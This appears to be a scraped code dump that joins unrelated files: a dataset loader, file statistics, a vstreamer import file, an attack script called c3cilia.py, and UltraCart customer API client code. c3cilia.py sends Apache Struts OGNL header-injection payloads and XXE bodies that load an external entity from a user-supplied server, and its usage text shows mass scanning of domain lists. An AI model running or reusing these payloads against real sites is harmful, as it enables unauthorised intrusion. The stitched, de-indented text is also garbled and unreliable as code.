lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
d = (context, question['text'], question['label'])
is_provable = "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']
if cwa == CWA.ALL or (cwa == CWA.NOT_CWA and is_provable) or (cwa == CWA.CWA and not is_provable):
if len(select_depth) > 0:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class NatLangDataset(Dataset):
def __init__(self, root, split='train', select_depth=None, cwa=CWA.ALL):
self.data = []
self.label_dict = {True: 1, False: 0}
with open(f'{root}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
d = (context, question['text'], question['label'])
is_provable = "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']
if cwa == CWA.ALL or (cwa == CWA.NOT_CWA and is_provable) or (cwa == CWA.CWA and not is_provable):
if len(select_depth) > 0:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
| 43.906344
| 120
| 0.547237
| 1,788
| 14,533
| 4.280201
| 0.055369
| 0.085718
| 0.036587
| 0.03528
| 0.934405
| 0.921991
| 0.908663
| 0.908663
| 0.90801
| 0.90801
| 0
| 0.009885
| 0.324778
| 14,533
| 331
| 121
| 43.906344
| 0.769999
| 0.13232
| 0
| 0.894737
| 0
| 0
| 0.075553
| 0.016224
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11336
| false
| 0
| 0.016194
| 0.036437
| 0.251012
| 0.032389
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2459d95b08925f110f36acd054e21d37c6c23dc2
| 126
|
py
|
Python
|
vstreamer/client/player/__init__.py
|
artudi54/video-streamer
|
66e5e722ed66abe5877488f177c0ac4f13325382
|
[
"MIT"
] | 2
|
2019-10-08T10:49:52.000Z
|
2021-10-01T11:26:31.000Z
|
vstreamer/client/player/__init__.py
|
artudi54/video-streamer
|
66e5e722ed66abe5877488f177c0ac4f13325382
|
[
"MIT"
] | 1
|
2019-05-16T13:48:29.000Z
|
2019-05-16T13:48:49.000Z
|
vstreamer/client/player/__init__.py
|
artudi54/video-streamer
|
66e5e722ed66abe5877488f177c0ac4f13325382
|
[
"MIT"
] | 1
|
2019-10-08T10:49:56.000Z
|
2019-10-08T10:49:56.000Z
|
from vstreamer.client.player.VideoPlayerBar import VideoPlayerBar
from vstreamer.client.player.VideoPlayer import VideoPlayer
| 42
| 65
| 0.888889
| 14
| 126
| 8
| 0.5
| 0.232143
| 0.339286
| 0.446429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063492
| 126
| 2
| 66
| 63
| 0.949153
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
033743a8d96608444da334121a3f1056ab58df6b
| 7,876
|
py
|
Python
|
c3cilia.py
|
karthi-the-hacker/c3cilia
|
a62cb92fc393a513a7432fd02a85393339649e16
|
[
"MIT"
] | 1
|
2020-12-01T04:43:02.000Z
|
2020-12-01T04:43:02.000Z
|
c3cilia.py
|
karthi-the-hacker/c3cilia
|
a62cb92fc393a513a7432fd02a85393339649e16
|
[
"MIT"
] | null | null | null |
c3cilia.py
|
karthi-the-hacker/c3cilia
|
a62cb92fc393a513a7432fd02a85393339649e16
|
[
"MIT"
] | null | null | null |
#importing important lib
import requests
import sys
blink = '\33[5m'
cyan ='\033[36m'
yellow ='\033[33m'
payload = '.multipart/form-data~%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("karthithehacker",4*4)}'
payload1 = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('karthithehacker',4*4)}.multipart/form-data"
head = {
'User-Agent': 'c3cillia (https://github.com/karthi-the-hacker/c3cilia)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload),
'Accept': '*/*'
}
head1 = {
'User-Agent': 'c3cillia (https://github.com/karthi-the-hacker/c3cilia)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload1),
'Accept': '*/*'
}
def banner():
print (yellow)
print " .-----------------------------. "
print " | Hi Hackers | "
print (" | Tool : "+ cyan + "c3cilia "+yellow+ "|")
print " | Author : @karthi_the_hacker| "
print " | Jai Hind | "
print " '-----------------------------' "
print " ^ (\_/) "
print " '----- (O.o) "
print " (> <) "
print " "
def psend():
#getting CLI arg
url = sys.argv[5]
server = sys.argv[2]
#setting data for post request
proxies = {"http": "http://127.0.0.1:7777", "https": "http://127.0.0.1:7777"}
header = {'Content-Type': 'test/xml'}
typel = {'X-HTTP-Method-Override':'PUT'}
agent = {'User-Agent': 'karthi_the_hacker'}
entity = '<?xml version=\"1.0\" ?>\r\n<!DOCTYPE xxeElement [\r\n<!ELEMENT xxeElement ANY >\r\n<!ENTITY % emails SYSTEM \"'
entity += server + '\">'
entity += '\r\n%emails;\r\n%content;\r\n]>\r\n<email>&emails;</email>'
#sending post request
x = requests.post(url, data=entity , proxies=proxies, headers=header , verify=False)
print("> " + x.url + " <---url")
print(x.request)
print(x)
print(x.headers)
#print(x.text)
print(x.links)
print("\n <-----------------------------------xxe scan-----------------------------------------------> \n")
i = requests.post(url + "sample.html" , headers=typel , proxies=proxies, verify=False)
print("> " + i.url + " <---url")
print(i.request)
print(i)
print(i.headers)
#print(i.text)
print(i.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
r = requests.put(url + "sample.html", proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(r.request)
print(r)
print(r.headers)
#print(r.text)
print(r.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
s = requests.get(url , headers=head , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(s.request)
print(s)
print(s.headers)
#print(s.text)
print(s.links)
print("\n <---------------------------------struck get scan-------------------------------------------------> \n")
s1 = requests.get(url , headers=head1 , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(s1.request)
print(s1)
print(s1.headers)
#print(s1.text)
print(s1.links)
print("\n <---------------------------------struck get 1 scan-------------------------------------------------> \n")
sp = requests.post(url , headers=head , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(sp.request)
print(sp)
print(sp.headers)
#print(sp.text)
print(sp.links)
print("\n <---------------------------------struck post scan-------------------------------------------------> \n")
sp1 = requests.post(url , headers=head1 , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(sp1.request)
print(sp1)
print(sp1.headers)
#print(sp1.text)
print(sp1.links)
print("\n <---------------------------------struck post 1 scan-------------------------------------------------> \n")
def send():
#getting CLI arg
url = sys.argv[4]
server = sys.argv[2]
header = {'Content-Type': 'test/xml'}
typel = {'X-HTTP-Method-Override':'PUT'}
agent = {'User-Agent': 'karthi_the_hacker'}
entity = '<?xml version=\"1.0\" ?>\r\n<!DOCTYPE xxeElement [\r\n<!ELEMENT xxeElement ANY >\r\n<!ENTITY % emails SYSTEM \"'
entity += server + '\">'
entity += '\r\n%emails;\r\n%content;\r\n]>\r\n<email>&emails;</email>'
#sending post request
x = requests.post(url, data=entity , headers=header , verify=False)
print("> " + x.url + " <---url")
print(x.request)
print(x)
print(x.headers)
#print(x.text)
print(x.links)
print("\n <---------------------------------xxe scan-------------------------------------------------> \n")
i = requests.post(url + "sample.html", headers=typel , verify=False)
print("> " + i.url + " <---url")
print(i.request)
print(i)
print(i.headers)
#print(i.text)
print(i.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
r = requests.put(url + "sample.html")
print("> " + r.url + " <---url")
print(r.request)
print(r)
print(r.headers)
#print(r.text)
print(r.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
s = requests.get(url , headers=head , verify=False)
print("> " + r.url + " <---url")
print(s.request)
print(s)
print(s.headers)
#print(s.text)
print(s.links)
print("\n <---------------------------------struck get scan-------------------------------------------------> \n")
s1 = requests.get(url , headers=head1 , verify=False)
print("> " + r.url + " <---url")
print(s1.request)
print(s1)
print(s1.headers)
#print(s1.text)
print(s1.links)
print("\n <---------------------------------struck get 1 scan-------------------------------------------------> \n")
sp = requests.post(url , headers=head , verify=False)
print("> " + r.url + " <---url")
print(sp.request)
print(sp)
print(sp.headers)
#print(sp.text)
print(sp.links)
print("\n <---------------------------------struck post scan-------------------------------------------------> \n")
sp1 = requests.post(url , headers=head1 , verify=False)
print("> " + r.url + " <---url")
print(sp1.request)
print(sp1)
print(sp1.headers)
#print(sp1.text)
print(sp1.links)
print("\n <---------------------------------struck post 1 scan-------------------------------------------------> \n")
def helpl():
    """Print the usage banner plus example invocations for every mode."""
    banner()
    # (label, command) pairs; each line is printed as cyan label + yellow
    # command so the output is byte-identical to the hand-written version.
    examples = [
        ("For single domain : ",
         "python c3cilia.py --url http://yourserver.com/ --target https://target.com/"),
        ("For multiple domain : ",
         "cat live-domain.txt | xargs -n1 -p50 python c3cilia.py -u http://yourserver.com/ -t " + yellow),
        ("For multiple domain with proxy : ",
         "cat live-domain.txt | xargs -n1 -p50 python c3cilia.py -u http://yourserver.com/ -p -t " + yellow),
        ("For single domain with proxy : ",
         "python c3cilia.py --url http://yourserver.com/ --proxy --target https://target.com/"),
    ]
    for label, command in examples:
        print(cyan + label + yellow + command)
# Command-line dispatch.
# BUG FIX: the original `elif` conditions relied on `and` binding tighter
# than `or`, e.g. `len(sys.argv) == 5 and A or B` parsed as
# `(len(sys.argv) == 5 and A) or B`, so a lone `--target` at argv[3]
# triggered send() regardless of argument count.  The grouping below
# implements the intent documented in helpl().
if len(sys.argv) <= 1:
    banner()
    print("You must provide a target. Use -h or --help for help.")
    print(" ")
    sys.exit()
if sys.argv[1] in ("-h", "--help"):
    helpl()
    sys.exit()
elif (len(sys.argv) == 5
        and sys.argv[1] in ("-u", "--url")
        and sys.argv[3] in ("-t", "--target")):
    send()
elif (len(sys.argv) == 6
        and sys.argv[1] in ("-u", "--url")
        and sys.argv[3] in ("-p", "--proxy")
        and sys.argv[4] in ("-t", "--target")):
    print("proxy")
    psend()
| 38.79803
| 211
| 0.508507
| 969
| 7,876
| 4.125903
| 0.160991
| 0.030015
| 0.038519
| 0.030015
| 0.837919
| 0.792646
| 0.774137
| 0.774137
| 0.753627
| 0.747374
| 0
| 0.023448
| 0.155282
| 7,876
| 202
| 212
| 38.990099
| 0.577484
| 0.069705
| 0
| 0.630303
| 0
| 0.054545
| 0.482409
| 0.243258
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.012121
| null | null | 0.618182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
035a327c0d599ec905f11b9f42622c196e5c0c1e
| 67,403
|
py
|
Python
|
ultracart/api/customer_api.py
|
UltraCart/rest_api_v2_sdk_python
|
d734ea13fabc7a57872ff68bac06861edb8fd882
|
[
"Apache-2.0"
] | 1
|
2018-03-15T16:56:23.000Z
|
2018-03-15T16:56:23.000Z
|
ultracart/api/customer_api.py
|
UltraCart/rest_api_v2_sdk_python
|
d734ea13fabc7a57872ff68bac06861edb8fd882
|
[
"Apache-2.0"
] | null | null | null |
ultracart/api/customer_api.py
|
UltraCart/rest_api_v2_sdk_python
|
d734ea13fabc7a57872ff68bac06861edb8fd882
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ultracart.api_client import ApiClient
from ultracart.configuration import Configuration
class CustomerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
@classmethod
def fromApiKey(cls, apiKey, verify_ssl = True, debug = False):
    """Alternate constructor: build a CustomerApi authenticated by a simple API key.

    :param str apiKey: UltraCart simple API key.
    :param bool verify_ssl: whether the client verifies TLS certificates.
    :param bool debug: enable client debug logging.
    :return: a CustomerApi wired to a freshly configured ApiClient.
    """
    cfg = Configuration()
    cfg.api_key['x-ultracart-simple-key'] = apiKey
    cfg.debug = debug
    cfg.verify_ssl = verify_ssl
    # Pin the API version header expected by the UltraCart backend.
    client = ApiClient(configuration=cfg,
                       header_name='X-UltraCart-Api-Version',
                       header_value='2017-03-01')
    return CustomerApi(client)
def delete_customer(self, customer_profile_oid, **kwargs):  # noqa: E501
    """Delete a customer  # noqa: E501

    Delete a customer on the UltraCart account.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_customer(customer_profile_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int customer_profile_oid: The customer_profile_oid to delete. (required)
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: callers get only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the request thread when async_req is truthy,
    # otherwise the deserialized data; both are passed straight through.
    return self.delete_customer_with_http_info(customer_profile_oid, **kwargs)  # noqa: E501
def delete_customer_with_http_info(self, customer_profile_oid, **kwargs):  # noqa: E501
    """Delete a customer  # noqa: E501

    Delete a customer on the UltraCart account.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_customer_with_http_info(customer_profile_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int customer_profile_oid: The customer_profile_oid to delete. (required)
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Reject keyword arguments this endpoint does not understand.
    accepted = {'customer_profile_oid', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_customer" % name
            )
    params = dict(kwargs, customer_profile_oid=customer_profile_oid)

    # verify the required parameter 'customer_profile_oid' is set
    if params['customer_profile_oid'] is None:
        raise ValueError("Missing the required parameter `customer_profile_oid` when calling `delete_customer`")  # noqa: E501

    path_params = {'customer_profile_oid': params['customer_profile_oid']}  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json; charset=UTF-8']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

    return self.api_client.call_api(
        '/customer/customers/{customer_profile_oid}', 'DELETE',
        path_params,
        [],                 # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CustomerResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_customer(self, customer_profile_oid, **kwargs):  # noqa: E501
    """Retrieve a customer  # noqa: E501

    Retrieves a single customer using the specified customer profile oid.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer(customer_profile_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int customer_profile_oid: The customer oid to retrieve. (required)
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: always ask the delegate for the payload only.
    kwargs['_return_http_data_only'] = True
    # Thread when async_req is truthy, deserialized data otherwise.
    return self.get_customer_with_http_info(customer_profile_oid, **kwargs)  # noqa: E501
def get_customer_with_http_info(self, customer_profile_oid, **kwargs):  # noqa: E501
    """Retrieve a customer  # noqa: E501

    Retrieves a single customer using the specified customer profile oid.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_with_http_info(customer_profile_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int customer_profile_oid: The customer oid to retrieve. (required)
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Reject keyword arguments this endpoint does not understand.
    accepted = {'customer_profile_oid', 'expand', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customer" % name
            )
    params = dict(kwargs, customer_profile_oid=customer_profile_oid)

    # verify the required parameter 'customer_profile_oid' is set
    if params['customer_profile_oid'] is None:
        raise ValueError("Missing the required parameter `customer_profile_oid` when calling `get_customer`")  # noqa: E501

    path_params = {'customer_profile_oid': params['customer_profile_oid']}  # noqa: E501

    # `expand` travels as the `_expand` query parameter when supplied.
    query_params = []
    if 'expand' in params:
        query_params.append(('_expand', params['expand']))  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

    return self.api_client.call_api(
        '/customer/customers/{customer_profile_oid}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CustomerResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_customer_by_email(self, email, **kwargs):  # noqa: E501
    """Retrieve a customer by Email  # noqa: E501

    Retrieves a single customer using the specified customer email address.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_by_email(email, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str email: The email address of the customer to retrieve. (required)
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: always ask the delegate for the payload only.
    kwargs['_return_http_data_only'] = True
    # Thread when async_req is truthy, deserialized data otherwise.
    return self.get_customer_by_email_with_http_info(email, **kwargs)  # noqa: E501
def get_customer_by_email_with_http_info(self, email, **kwargs):  # noqa: E501
    """Retrieve a customer by Email  # noqa: E501

    Retrieves a single customer using the specified customer email address.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_by_email_with_http_info(email, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str email: The email address of the customer to retrieve. (required)
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Reject keyword arguments this endpoint does not understand.
    accepted = {'email', 'expand', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customer_by_email" % name
            )
    params = dict(kwargs, email=email)

    # verify the required parameter 'email' is set
    if params['email'] is None:
        raise ValueError("Missing the required parameter `email` when calling `get_customer_by_email`")  # noqa: E501

    path_params = {'email': params['email']}  # noqa: E501

    # `expand` travels as the `_expand` query parameter when supplied.
    query_params = []
    if 'expand' in params:
        query_params.append(('_expand', params['expand']))  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

    return self.api_client.call_api(
        '/customer/customers/by_email/{email}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CustomerResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_customer_editor_values(self, **kwargs):  # noqa: E501
    """Retrieve values needed for a customer profile editor  # noqa: E501

    Retrieve values needed for a customer profile editor.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_editor_values(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: CustomerEditorValues
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: always ask the delegate for the payload only.
    kwargs['_return_http_data_only'] = True
    # Thread when async_req is truthy, deserialized data otherwise.
    return self.get_customer_editor_values_with_http_info(**kwargs)  # noqa: E501
def get_customer_editor_values_with_http_info(self, **kwargs):  # noqa: E501
    """Retrieve values needed for a customer profile editor  # noqa: E501

    Retrieve values needed for a customer profile editor.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_editor_values_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: CustomerEditorValues
             If the method is called asynchronously,
             returns the request thread.
    """
    # This endpoint has no endpoint-specific parameters; only the
    # transport-control keywords are legal.
    accepted = {'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customer_editor_values" % name
            )

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

    return self.api_client.call_api(
        '/customer/editor_values', 'GET',
        {},                 # no path parameters
        [],                 # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CustomerEditorValues',  # noqa: E501
        auth_settings=auth_settings,
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_customer_email_lists(self, **kwargs):  # noqa: E501
    """Retrieve all email lists across all storefronts  # noqa: E501

    Retrieve all email lists across all storefronts  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_email_lists(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: EmailListsResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: always ask the delegate for the payload only.
    kwargs['_return_http_data_only'] = True
    # Thread when async_req is truthy, deserialized data otherwise.
    return self.get_customer_email_lists_with_http_info(**kwargs)  # noqa: E501
def get_customer_email_lists_with_http_info(self, **kwargs):  # noqa: E501
    """Retrieve all email lists across all storefronts  # noqa: E501

    Retrieve all email lists across all storefronts  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_email_lists_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: EmailListsResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # This endpoint has no endpoint-specific parameters; only the
    # transport-control keywords are legal.
    accepted = {'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customer_email_lists" % name
            )

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

    return self.api_client.call_api(
        '/customer/email_lists', 'GET',
        {},                 # no path parameters
        [],                 # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='EmailListsResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_customers(self, **kwargs):  # noqa: E501
    """Retrieve customers  # noqa: E501

    Retrieves customers from the account.  If no parameters are specified, all customers will be returned.  You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customers(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str email: Email
    :param str qb_class: Quickbooks class
    :param str quickbooks_code: Quickbooks code
    :param str last_modified_dts_start: Last modified date start
    :param str last_modified_dts_end: Last modified date end
    :param str signup_dts_start: Signup date start
    :param str signup_dts_end: Signup date end
    :param str billing_first_name: Billing first name
    :param str billing_last_name: Billing last name
    :param str billing_company: Billing company
    :param str billing_city: Billing city
    :param str billing_state: Billing state
    :param str billing_postal_code: Billing postal code
    :param str billing_country_code: Billing country code
    :param str billing_day_phone: Billing day phone
    :param str billing_evening_phone: Billing evening phone
    :param str shipping_first_name: Shipping first name
    :param str shipping_last_name: Shipping last name
    :param str shipping_company: Shipping company
    :param str shipping_city: Shipping city
    :param str shipping_state: Shipping state
    :param str shipping_postal_code: Shipping postal code
    :param str shipping_country_code: Shipping country code
    :param str shipping_day_phone: Shipping day phone
    :param str shipping_evening_phone: Shipping evening phone
    :param int pricing_tier_oid: Pricing tier oid
    :param str pricing_tier_name: Pricing tier name
    :param int limit: The maximum number of records to return on this one API call. (Max 200)
    :param int offset: Pagination of the record set.  Offset is a zero based index.
    :param str since: Fetch customers that have been created/modified since this date/time.
    :param str sort: The sort order of the customers.  See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomersResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: always ask the delegate for the payload only.
    kwargs['_return_http_data_only'] = True
    # Thread when async_req is truthy, deserialized data otherwise.
    return self.get_customers_with_http_info(**kwargs)  # noqa: E501
def get_customers_with_http_info(self, **kwargs):  # noqa: E501
    """Retrieve customers  # noqa: E501

    Retrieves customers from the account.  If no parameters are specified, all customers will be returned.  You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customers_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str email: Email
    :param str qb_class: Quickbooks class
    :param str quickbooks_code: Quickbooks code
    :param str last_modified_dts_start: Last modified date start
    :param str last_modified_dts_end: Last modified date end
    :param str signup_dts_start: Signup date start
    :param str signup_dts_end: Signup date end
    :param str billing_first_name: Billing first name
    :param str billing_last_name: Billing last name
    :param str billing_company: Billing company
    :param str billing_city: Billing city
    :param str billing_state: Billing state
    :param str billing_postal_code: Billing postal code
    :param str billing_country_code: Billing country code
    :param str billing_day_phone: Billing day phone
    :param str billing_evening_phone: Billing evening phone
    :param str shipping_first_name: Shipping first name
    :param str shipping_last_name: Shipping last name
    :param str shipping_company: Shipping company
    :param str shipping_city: Shipping city
    :param str shipping_state: Shipping state
    :param str shipping_postal_code: Shipping postal code
    :param str shipping_country_code: Shipping country code
    :param str shipping_day_phone: Shipping day phone
    :param str shipping_evening_phone: Shipping evening phone
    :param int pricing_tier_oid: Pricing tier oid
    :param str pricing_tier_name: Pricing tier name
    :param int limit: The maximum number of records to return on this one API call. (Max 200)
    :param int offset: Pagination of the record set.  Offset is a zero based index.
    :param str since: Fetch customers that have been created/modified since this date/time.
